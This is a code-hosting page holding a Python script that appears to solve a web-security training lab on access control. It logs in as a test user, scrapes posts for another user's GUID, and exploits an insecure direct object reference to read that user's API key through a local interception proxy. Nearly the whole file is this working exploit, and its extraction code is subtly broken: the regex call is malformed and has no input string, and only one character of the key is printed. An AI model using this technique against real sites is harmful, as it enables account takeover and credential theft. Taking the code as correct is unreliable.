BigShrimpin/random-script-i-made
1
1
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a1f1da620389051271299b3dac58328f848dc479
random-script-i-made/lab.py/access-control-lab06.py
BigShrimpin a1f1da6203 Upload files to "lab.py"
2026-02-25 20:44:01 +00:00

84 lines
2.4 KiB
Python
Raw Blame History

import requests
import urllib3
import sys
from bs4 import BeautifulSoup
import re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {"http":"127.0.0.1:8080", "https":"127.0.0.1:8080"}
def get_csrf_token(s, url):
r = s.get(url, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, "html.parser")
csrf = soup.find("input", {"name":"csrf"})["value"]
return csrf
def carlos_guid(s, url):
# Load home page
r= requests.get(url, verify=False, proxies=proxies)
res = r.text
post_ids = re.findall(r'postId=(\w+)"', res)
unique_post_ids = list(set(post_ids))
# Loop through post_ids to identify one written by carlos
for i in unique_post_ids:
r = s.get(url + "/post?postId=" + i, verify=False, proxies=proxies)
res = r.text
if "carlos" in res:
print("Found Carlos GUID...")
guid = re.findall(r"userId=(.*)'", res)[0]
return guid
def carlos_api_key(s, url):
# Get CSRF token from login page
login_url = url + "/login"
print("Locating CSRF Token...")
csrf_token = get_csrf_token(s, login_url)
# Login
print("Logging in as wiener...")
data_login = {"csrf":csrf_token,
"username":"wiener",
"password":"peter"}
r = s.post(login_url, data=data_login, verify=False, proxies=proxies)
res = r.text
if "Log out" in res:
print("(+) Successfully logged in!")
# Find post with carlos GUID
guid = carlos_guid(s, url)
# Obtain Carlos API key
carlos_account_url = url + "/my-account?id=" + guid
r = s.get(carlos_account_url, verify=False, proxies=proxies)
res = r.text
if "carlos" in res:
print("Successfully accessed Carlos account")
print("Retrieving API key")
api_key = re.findall(r"Your API Key is:(.*)\<\/div\>'")[0]
print("API key:" + api_key[0])
else:
print("Could not access carlos account")
sys.exit(-1)
else:
print("(-) Unable to login")
sys.exit(-1)
def main():
if len(sys.argv) != 2:
print("(-) Usage: python %s <url>" % sys.argv[0])
print("(-) Example: python %s example.com" % sys.argv[0])
sys.exit(-1)
s = requests.Session()
url = sys.argv[1]
carlos_api_key(s, url)
if __name__ == "__main__":
main()
Reference in New Issue View Git Blame Copy Permalink